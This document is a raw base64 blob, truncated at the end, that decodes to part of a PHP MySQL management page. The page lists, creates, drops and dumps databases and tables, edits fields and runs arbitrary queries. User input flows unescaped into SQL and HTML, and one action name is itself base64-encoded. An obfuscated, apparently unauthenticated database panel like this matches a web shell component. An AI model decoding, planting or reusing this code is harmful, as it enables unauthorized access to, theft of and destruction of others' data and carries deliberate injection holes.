DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+J